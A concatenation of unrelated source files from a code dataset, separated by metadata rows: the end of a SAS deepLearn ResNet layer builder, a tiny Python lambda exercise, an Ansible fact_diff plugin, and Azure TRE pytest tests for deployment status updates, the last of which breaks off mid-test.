# res4b30_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b30_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b30_branch2c'])
# res4b30 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b30',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b30_branch2c', 'res4b29'])
# ------------------- Residual Layer 4B31 -----------------------
# res4b31_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b31_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b30'])
# res4b31_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b31_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b31_branch2a'])
# res4b31_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b31_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b31_branch2a'])
# res4b31_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b31_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b31_branch2b'])
# res4b31_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b31_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b31_branch2b'])
# res4b31_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b31_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b31_branch2c'])
# res4b31 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b31',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b31_branch2c', 'res4b30'])
# ------------------- Residual Layer 4B32 -----------------------
# res4b32_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b32_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b31'])
# res4b32_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b32_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b32_branch2a'])
# res4b32_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b32_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b32_branch2a'])
# res4b32_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b32_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b32_branch2b'])
# res4b32_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b32_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b32_branch2b'])
# res4b32_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b32_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b32_branch2c'])
# res4b32 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b32',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b32_branch2c', 'res4b31'])
# ------------------- Residual Layer 4B33 -----------------------
# res4b33_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b33_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b32'])
# res4b33_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b33_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b33_branch2a'])
# res4b33_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b33_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b33_branch2a'])
# res4b33_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b33_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b33_branch2b'])
# res4b33_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b33_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b33_branch2b'])
# res4b33_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b33_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b33_branch2c'])
# res4b33 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b33',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b33_branch2c', 'res4b32'])
# ------------------- Residual Layer 4B34 -----------------------
# res4b34_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b34_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b33'])
# res4b34_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b34_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b34_branch2a'])
# res4b34_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b34_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b34_branch2a'])
# res4b34_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b34_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b34_branch2b'])
# res4b34_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b34_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b34_branch2b'])
# res4b34_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b34_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b34_branch2c'])
# res4b34 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b34',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b34_branch2c', 'res4b33'])
# ------------------- Residual Layer 4B35 -----------------------
# res4b35_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b35_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b34'])
# res4b35_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b35_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b35_branch2a'])
# res4b35_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b35_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b35_branch2a'])
# res4b35_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b35_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b35_branch2b'])
# res4b35_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b35_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b35_branch2b'])
# res4b35_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b35_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b35_branch2c'])
# res4b35 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b35',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b35_branch2c', 'res4b34'])
# ------------- Layer 5A -------------------- */
# res5a_branch1 layer: 2048 channels, 1x1 conv, output = 7 x 7
s.deepLearn.addLayer(model=model_table_opts, name='res5a_branch1',
layer=dict(type='convolution', nFilters=2048, width=1, height=1,
stride=2, includebias=False, act='identity'),
srcLayers=['res4b35'])
# res5a_branch1 batch norm layer: 2048 channels, output = 7 x 7
s.deepLearn.addLayer(model=model_table_opts, name='bn5a_branch1',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res5a_branch1'])
# res5a_branch2a layer: 512 channels, 1x1 conv, output = 7 x 7
s.deepLearn.addLayer(model=model_table_opts, name='res5a_branch2a',
layer=dict(type='convolution', nFilters=512, width=1, height=1,
stride=2, includebias=False, act='identity'),
srcLayers=['res4b35'])
# res5a_branch2a batch norm layer: 512 channels, output = 7 x 7
s.deepLearn.addLayer(model=model_table_opts, name='bn5a_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res5a_branch2a'])
# res5a_branch2b layer: 512 channels, 3x3 conv, output = 7 x 7
s.deepLearn.addLayer(model=model_table_opts, name='res5a_branch2b',
layer=dict(type='convolution', nFilters=512, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn5a_branch2a'])
# res5a_branch2b batch norm layer: 512 channels, output = 7 x 7
s.deepLearn.addLayer(model=model_table_opts, name='bn5a_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res5a_branch2b'])
# res5a_branch2c layer: 2048 channels, 1x1 conv, output = 7 x 7
s.deepLearn.addLayer(model=model_table_opts, name='res5a_branch2c',
layer=dict(type='convolution', nFilters=2048, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn5a_branch2b'])
# res5a_branch2c batch norm layer: 2048 channels, output = 7 x 7
s.deepLearn.addLayer(model=model_table_opts, name='bn5a_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res5a_branch2c'])
# res5a residual layer: 2048 channels, output = 7 x 7
s.deepLearn.addLayer(model=model_table_opts, name='res5a',
layer=dict(type='residual', act='relu'),
srcLayers=['bn5a_branch2c', 'bn5a_branch1'])
# ------------------- Residual Layer 5B -----------------------
# res5b_branch2a layer: 512 channels, 1x1 conv, output = 7 x 7
s.deepLearn.addLayer(model=model_table_opts, name='res5b_branch2a',
layer=dict(type='convolution', nFilters=512, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res5a'])
# res5b_branch2a batch norm layer: 512 channels, output = 7 x 7
s.deepLearn.addLayer(model=model_table_opts, name='bn5b_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res5b_branch2a'])
# res5b_branch2b layer: 512 channels, 3x3 conv, output = 7 x 7
s.deepLearn.addLayer(model=model_table_opts, name='res5b_branch2b',
layer=dict(type='convolution', nFilters=512, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn5b_branch2a'])
# res5b_branch2b batch norm layer: 512 channels, output = 7 x 7
s.deepLearn.addLayer(model=model_table_opts, name='bn5b_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res5b_branch2b'])
# res5b_branch2c layer: 2048 channels, 1x1 conv, output = 7 x 7
s.deepLearn.addLayer(model=model_table_opts, name='res5b_branch2c',
layer=dict(type='convolution', nFilters=2048, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn5b_branch2b'])
# res5b_branch2c batch norm layer: 2048 channels, output = 7 x 7
s.deepLearn.addLayer(model=model_table_opts, name='bn5b_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res5b_branch2c'])
# res5b residual layer: 2048 channels, output = 7 x 7
s.deepLearn.addLayer(model=model_table_opts, name='res5b',
layer=dict(type='residual', act='relu'),
srcLayers=['bn5b_branch2c', 'res5a'])
# ------------------- Residual Layer 5C -----------------------
# res5c_branch2a layer: 512 channels, 1x1 conv, output = 7 x 7
s.deepLearn.addLayer(model=model_table_opts, name='res5c_branch2a',
layer=dict(type='convolution', nFilters=512, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res5b'])
# res5c_branch2a batch norm layer: 512 channels, output = 7 x 7
s.deepLearn.addLayer(model=model_table_opts, name='bn5c_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res5c_branch2a'])
# res5c_branch2b layer: 512 channels, 3x3 conv, output = 7 x 7
s.deepLearn.addLayer(model=model_table_opts, name='res5c_branch2b',
layer=dict(type='convolution', nFilters=512, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn5c_branch2a'])
# res5c_branch2b batch norm layer: 512 channels, output = 7 x 7
s.deepLearn.addLayer(model=model_table_opts, name='bn5c_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res5c_branch2b'])
# res5c_branch2c layer: 2048 channels, 1x1 conv, output = 7 x 7
s.deepLearn.addLayer(model=model_table_opts, name='res5c_branch2c',
layer=dict(type='convolution', nFilters=2048, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn5c_branch2b'])
# res5c_branch2c batch norm layer: 2048 channels, output = 7 x 7
s.deepLearn.addLayer(model=model_table_opts, name='bn5c_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res5c_branch2c'])
# res5c residual layer: 2048 channels, output = 7 x 7
s.deepLearn.addLayer(model=model_table_opts, name='res5c',
layer=dict(type='residual', act='relu'),
srcLayers=['bn5c_branch2c', 'res5b'])
# ------------------- final layers ----------------------
# pool5 layer: 2048 channels, 7x7 pooling, output = 1 x 1
kernel_width = width // 2 // 2 // 2 // 2 // 2
kernel_height = height // 2 // 2 // 2 // 2 // 2
stride = kernel_width
s.deepLearn.addLayer(model=model_table_opts, name='pool5',
layer=dict(type='pooling', width=kernel_width,
height=kernel_height, stride=stride, pool='mean'),
srcLayers=['res5c'])
# fc1000 output layer: 1000 neurons */
s.deepLearn.addLayer(model=model_table_opts, name='fc1000',
layer=dict(type='output', n=1000, act='softmax'),
srcLayers=['pool5'])
return s.CASTable(**model_table_opts)
| 55.251381 | 99 | 0.576505 |
acdfa8c47463c3b2c434f4964162307a1fa0dc50 | 194 | py | Python | ExerciciosPYTHON/NovPython/018.py | Samuel-Melo890/Python-Desafios | 2abc7734d6a6c1f5ab67421f792d6889d93bac94 | [
"MIT"
] | null | null | null | ExerciciosPYTHON/NovPython/018.py | Samuel-Melo890/Python-Desafios | 2abc7734d6a6c1f5ab67421f792d6889d93bac94 | [
"MIT"
] | 2 | 2022-03-18T16:06:07.000Z | 2022-03-18T16:55:29.000Z | ExerciciosPYTHON/NovPython/018.py | Samuel-Melo890/Python-Desafios | 2abc7734d6a6c1f5ab67421f792d6889d93bac94 | [
"MIT"
] | null | null | null | from os import system
# Demo script: a first lambda function.
system('cls')  # clear the console (Windows 'cls'; prints an error and is otherwise harmless elsewhere)
print('='*8, 'Minha Primeira Função Lambda', '='*8)
# Fix: the original lambda named its parameter `str`, shadowing the builtin.
# Rename it so the builtin `str` stays usable inside the lambda body.
function = lambda text: print(text)
function('Minha Primeira Função Lambda')
function('Deus me abençoe!')
| 17.636364 | 49 | 0.71134 |
acdfa9c3f107eff69ba51844595a3857f2c040aa | 3,286 | py | Python | venv/lib/python3.6/site-packages/ansible_collections/ansible/utils/plugins/sub_plugins/fact_diff/native.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | 1 | 2020-01-22T13:11:23.000Z | 2020-01-22T13:11:23.000Z | venv/lib/python3.6/site-packages/ansible_collections/ansible/utils/plugins/sub_plugins/fact_diff/native.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | 12 | 2020-02-21T07:24:52.000Z | 2020-04-14T09:54:32.000Z | venv/lib/python3.6/site-packages/ansible_collections/ansible/utils/plugins/sub_plugins/fact_diff/native.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2020 Red Hat
# GNU General Public License v3.0+
# (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = """
author: Bradley Thornton (@cidrblock)
name: native
short_description: Define configurable options for C(native) sub-plugin of M(ansible.utils.fact_diff) module
description:
- This plugin documentation provides the configurable options that can be passed
to the I(ansible.utils.fact_diff) plugins when I(ansible.utils.native) is used as a value for
I(name) option of the module.
version_added: 1.0.0
"""
EXAMPLES = r"""
- name: Show the difference in json format
ansible.utils.fact_diff:
before: "{{ before }}"
after: "{{ after }}"
plugin:
name: ansible.utils.native
"""
import re
from ansible.plugins.callback import CallbackBase
from ansible_collections.ansible.utils.plugins.plugin_utils.base.fact_diff import (
FactDiffBase,
)
class FactDiff(FactDiffBase):
    """Native fact-diff plugin: diffs before/after, optionally dropping lines
    that match user-supplied skip regexes."""

    def _check_valid_regexes(self):
        """Compile each skip_lines entry in place, collecting messages for bad patterns."""
        if not self._skip_lines:
            return
        self._debug("Checking regex in 'split_lines' for validity")
        for position, pattern in enumerate(self._skip_lines):
            try:
                # Replace the raw string with its compiled form for reuse in _xform.
                self._skip_lines[position] = re.compile(pattern)
            except re.error as err:
                self._errors.append(
                    "The regex '{regex}', is not valid. The error was {err}.".format(
                        regex=pattern, err=str(err)
                    )
                )

    def _xform(self):
        """Normalize before/after: split strings, drop skipped lines, rejoin lists."""
        if self._skip_lines:
            if isinstance(self._before, str):
                self._debug("'before' is a string, splitting lines")
                self._before = self._before.splitlines()
            if isinstance(self._after, str):
                self._debug("'after' is a string, splitting lines")
                self._after = self._after.splitlines()

            def keep(line):
                # A line survives only if no compiled skip pattern matches it.
                return not any(rx.match(str(line)) for rx in self._skip_lines)

            self._before = [line for line in self._before if keep(line)]
            self._after = [line for line in self._after if keep(line)]

        if isinstance(self._before, list):
            self._debug("'before' is a list, joining with \n")
            self._before = "\n".join(map(str, self._before)) + "\n"
        if isinstance(self._after, list):
            self._debug("'after' is a list, joining with \n")
            self._after = "\n".join(map(str, self._after)) + "\n"

    def diff(self):
        """Return {'diff': ...} for the task args, or {'errors': ...} on bad regexes."""
        self._after = self._task_args["after"]
        self._before = self._task_args["before"]
        self._errors = []
        self._skip_lines = self._task_args["plugin"]["vars"].get("skip_lines")
        self._check_valid_regexes()
        if self._errors:
            return {"errors": " ".join(self._errors)}
        self._xform()
        # Reuse Ansible's callback diff renderer for consistent output formatting.
        return {
            "diff": CallbackBase()._get_diff(
                {"before": self._before, "after": self._after}
            )
        }
| 35.717391 | 112 | 0.578819 |
acdfaa8ccbd69f34480facf855d753f311da655a | 11,687 | py | Python | api_app/tests_ma/test_service_bus/test_deployment_status_update.py | damoodamoo/AzureTRE | 375c8e3ba94e27ed2a77009bf47453737e6d1d4c | [
"MIT"
] | null | null | null | api_app/tests_ma/test_service_bus/test_deployment_status_update.py | damoodamoo/AzureTRE | 375c8e3ba94e27ed2a77009bf47453737e6d1d4c | [
"MIT"
] | 1 | 2022-02-02T14:52:06.000Z | 2022-02-02T15:00:01.000Z | api_app/tests_ma/test_service_bus/test_deployment_status_update.py | damoodamoo/AzureTRE | 375c8e3ba94e27ed2a77009bf47453737e6d1d4c | [
"MIT"
] | null | null | null | import json
import pytest
import uuid
from mock import AsyncMock, patch
from db.errors import EntityDoesNotExist
from models.domain.workspace import Workspace
from models.domain.operation import Operation, Status
from resources import strings
from service_bus.deployment_status_update import receive_message_and_update_deployment
# Run every coroutine in this module as an asyncio test (pytest-asyncio).
pytestmark = pytest.mark.asyncio
# Payloads the handler must reject: non-JSON, and JSON missing required fields.
test_data = [
    'bad',
    '{"good": "json", "bad": "message"}'
]
OPERATION_ID = "0000c8e7-5c42-4fcb-a7fd-294cfc27aa76"
# Minimal well-formed deployment-status message. Shared across tests:
# tests should copy it rather than mutate it in place.
test_sb_message = {
    "operationId": OPERATION_ID,
    "id": "59b5c8e7-5c42-4fcb-a7fd-294cfc27aa76",
    "status": Status.Deployed,
    "message": "test message"
}
# Variant carrying deployment outputs; "name2" is deliberately JSON-quoted
# (the handler is expected to strip the quotes -- see the outputs test).
test_sb_message_with_outputs = {
    "operationId": OPERATION_ID,
    "id": "59b5c8e7-5c42-4fcb-a7fd-294cfc27aa76",
    "status": Status.Deployed,
    "message": "test message",
    "outputs": [
        {"Name": "name1", "Value": "value1", "Type": "type1"},
        {"Name": "name2", "Value": "\"value2\"", "Type": "type2"}
    ]
}
class ServiceBusReceivedMessageMock:
    """Minimal stand-in for an Azure Service Bus received message.

    The payload dict is serialised to JSON up front; ``str(mock)`` returns
    that JSON string, which is how the handler under test reads the body.
    """

    def __init__(self, message: dict) -> None:
        body = json.dumps(message)
        self.message = body
        self.correlation_id = "test_correlation_id"

    def __str__(self) -> str:
        return self.message
def create_sample_workspace_object(workspace_id):
    """Build a minimal Workspace fixture for the given resource id."""
    fields = {
        "id": workspace_id,
        "templateName": "tre-workspace-base",
        "templateVersion": "0.1.0",
        "properties": {},
        "resourcePath": "test",
    }
    return Workspace(**fields)
def create_sample_operation(resource_id):
    """Build an Operation fixture for *resource_id* (fixed OPERATION_ID)."""
    return Operation(
        id=OPERATION_ID,
        resourceId=resource_id,
        resourcePath="/workspaces/{}".format(resource_id),
        resourceVersion=0,
        message="test",
    )
@pytest.mark.parametrize("payload", test_data)
@patch('logging.error')
@patch('service_bus.deployment_status_update.ServiceBusClient')
@patch('fastapi.FastAPI')
async def test_receiving_bad_json_logs_error(app, sb_client, logging_mock, payload):
    """Malformed payloads are logged as errors but the message is still completed.

    ``@patch`` decorators inject bottom-up: ``app`` is the FastAPI mock,
    ``sb_client`` the ServiceBusClient mock, ``logging_mock`` the patched
    ``logging.error``.
    """
    service_bus_received_message_mock = ServiceBusReceivedMessageMock(payload)
    # Queue receiver yields exactly one (bad) message to the handler.
    sb_client().get_queue_receiver().receive_messages = AsyncMock(return_value=[service_bus_received_message_mock])
    sb_client().get_queue_receiver().complete_message = AsyncMock()
    await receive_message_and_update_deployment(app)
    # First positional arg of logging.error should carry the format-error text.
    error_message = logging_mock.call_args.args[0]
    assert error_message.startswith(strings.DEPLOYMENT_STATUS_MESSAGE_FORMAT_INCORRECT)
    # The handler is still expected to complete the bad message.
    sb_client().get_queue_receiver().complete_message.assert_called_once_with(service_bus_received_message_mock)
@patch('service_bus.deployment_status_update.OperationRepository')
@patch('service_bus.deployment_status_update.ResourceRepository')
@patch('logging.error')
@patch('service_bus.deployment_status_update.ServiceBusClient')
@patch('fastapi.FastAPI')
async def test_receiving_good_message(app, sb_client, logging_mock, repo, _):
    """Happy path: resource is looked up by UUID, saved back, message completed.

    ``@patch`` decorators inject bottom-up; the last parameter is the unused
    OperationRepository mock.
    """
    service_bus_received_message_mock = ServiceBusReceivedMessageMock(test_sb_message)
    sb_client().get_queue_receiver().receive_messages = AsyncMock(return_value=[service_bus_received_message_mock])
    sb_client().get_queue_receiver().complete_message = AsyncMock()
    expected_workspace = create_sample_workspace_object(test_sb_message["id"])
    repo().get_resource_dict_by_id.return_value = expected_workspace.dict()
    await receive_message_and_update_deployment(app)
    # Lookup must use the message id parsed as a UUID.
    repo().get_resource_dict_by_id.assert_called_once_with(uuid.UUID(test_sb_message["id"]))
    repo().update_item_dict.assert_called_once_with(expected_workspace.dict())
    # No error may be logged on the happy path.
    logging_mock.assert_not_called()
    sb_client().get_queue_receiver().complete_message.assert_called_once_with(service_bus_received_message_mock)
@patch('service_bus.deployment_status_update.OperationRepository')
@patch('service_bus.deployment_status_update.ResourceRepository')
@patch('logging.error')
@patch('service_bus.deployment_status_update.ServiceBusClient')
@patch('fastapi.FastAPI')
async def test_when_updating_non_existent_workspace_error_is_logged(app, sb_client, logging_mock, repo, _):
    """Unknown resource id: an ID-not-found error is logged, message completed."""
    service_bus_received_message_mock = ServiceBusReceivedMessageMock(test_sb_message)
    sb_client().get_queue_receiver().receive_messages = AsyncMock(return_value=[service_bus_received_message_mock])
    sb_client().get_queue_receiver().complete_message = AsyncMock()
    # Simulate the resource missing from the state store.
    repo().get_resource_dict_by_id.side_effect = EntityDoesNotExist
    await receive_message_and_update_deployment(app)
    expected_error_message = strings.DEPLOYMENT_STATUS_ID_NOT_FOUND.format(test_sb_message["id"])
    logging_mock.assert_called_once_with(expected_error_message)
    # Completed anyway: redelivering an unknown id would not help.
    sb_client().get_queue_receiver().complete_message.assert_called_once_with(service_bus_received_message_mock)
@patch('service_bus.deployment_status_update.OperationRepository')
@patch('service_bus.deployment_status_update.ResourceRepository')
@patch('logging.error')
@patch('service_bus.deployment_status_update.ServiceBusClient')
@patch('fastapi.FastAPI')
async def test_when_updating_and_state_store_exception(app, sb_client, logging_mock, repo, _):
    """State-store failure: error logged, message NOT completed (left for retry)."""
    service_bus_received_message_mock = ServiceBusReceivedMessageMock(test_sb_message)
    sb_client().get_queue_receiver().receive_messages = AsyncMock(return_value=[service_bus_received_message_mock])
    sb_client().get_queue_receiver().complete_message = AsyncMock()
    # Any unexpected exception from the store is treated as "not responding".
    repo().get_resource_dict_by_id.side_effect = Exception
    await receive_message_and_update_deployment(app)
    # The handler appends the (empty) exception text after a space.
    logging_mock.assert_called_once_with(strings.STATE_STORE_ENDPOINT_NOT_RESPONDING + " ")
    # Not completed, so the message can be redelivered.
    sb_client().get_queue_receiver().complete_message.assert_not_called()
@patch('service_bus.deployment_status_update.OperationRepository')
@patch('service_bus.deployment_status_update.ResourceRepository')
@patch('logging.error')
@patch('service_bus.deployment_status_update.ServiceBusClient')
@patch('fastapi.FastAPI')
async def test_state_transitions_from_deployed_to_deploying_does_not_transition(app, sb_client, logging_mock, repo, _):
    """A 'Deploying' status for an already-Deployed resource is ignored.

    The resource dict written back must equal the fetched one (no backwards
    state transition). ``@patch`` mocks are injected bottom-up.
    """
    # Fix: copy the shared fixture instead of mutating it in place, which
    # previously leaked the modified "status" into later tests.
    updated_message = {**test_sb_message, "status": Status.Deploying}
    service_bus_received_message_mock = ServiceBusReceivedMessageMock(updated_message)
    sb_client().get_queue_receiver().receive_messages = AsyncMock(return_value=[service_bus_received_message_mock])
    sb_client().get_queue_receiver().complete_message = AsyncMock()
    expected_workspace = create_sample_workspace_object(test_sb_message["id"])
    repo().get_resource_dict_by_id.return_value = expected_workspace.dict()
    await receive_message_and_update_deployment(app)
    # Saved resource identical to what was fetched: the transition was rejected.
    repo().update_item_dict.assert_called_once_with(expected_workspace.dict())
@patch('service_bus.deployment_status_update.OperationRepository')
@patch('service_bus.deployment_status_update.ResourceRepository')
@patch('logging.error')
@patch('service_bus.deployment_status_update.ServiceBusClient')
@patch('fastapi.FastAPI')
async def test_state_transitions_from_deployed_to_deleted(app, sb_client, logging_mock, repo, operations_repo_mock):
    """A 'Deleted' status update is propagated onto the tracked operation."""
    # Fix: build a per-test copy instead of mutating the shared fixture,
    # which previously leaked "status"/"message" into later tests.
    updated_message = {
        **test_sb_message,
        "status": Status.Deleted,
        "message": "Has been deleted",
    }
    service_bus_received_message_mock = ServiceBusReceivedMessageMock(updated_message)
    sb_client().get_queue_receiver().receive_messages = AsyncMock(return_value=[service_bus_received_message_mock])
    sb_client().get_queue_receiver().complete_message = AsyncMock()
    workspace = create_sample_workspace_object(test_sb_message["id"])
    repo().get_resource_dict_by_id.return_value = workspace.dict()
    operation = create_sample_operation(workspace.id)
    operations_repo_mock().get_operation_by_id.return_value = operation
    # Independent expected object so assertions can't be satisfied by aliasing.
    expected_operation = create_sample_operation(workspace.id)
    expected_operation.status = Status.Deleted
    expected_operation.message = updated_message["message"]
    await receive_message_and_update_deployment(app)
    operations_repo_mock().update_operation_status.assert_called_once_with(expected_operation.id, expected_operation.status, expected_operation.message)
@patch('service_bus.deployment_status_update.OperationRepository')
@patch('service_bus.deployment_status_update.ResourceRepository')
@patch('logging.error')
@patch('service_bus.deployment_status_update.ServiceBusClient')
@patch('fastapi.FastAPI')
async def test_state_transitions_from_deployed_to_delete_failed(app, sb_client, logging_mock, repo, operations_repo_mock):
    """Status/message from a 'Deleting' update are written to the operation.

    NOTE(review): despite the name, this exercises ``Status.Deleting``, not
    a delete-failure status -- confirm which status was intended.
    """
    # Fix: copy the shared fixture rather than mutating it in place.
    updated_message = {
        **test_sb_message,
        "status": Status.Deleting,
        "message": "Is being deleted",
    }
    service_bus_received_message_mock = ServiceBusReceivedMessageMock(updated_message)
    sb_client().get_queue_receiver().receive_messages = AsyncMock(return_value=[service_bus_received_message_mock])
    sb_client().get_queue_receiver().complete_message = AsyncMock()
    workspace = create_sample_workspace_object(test_sb_message["id"])
    repo().get_resource_dict_by_id.return_value = workspace.dict()
    operation = create_sample_operation(workspace.id)
    operations_repo_mock().get_operation_by_id.return_value = operation
    expected_operation = create_sample_operation(workspace.id)
    expected_operation.status = Status.Deleting
    expected_operation.message = updated_message["message"]
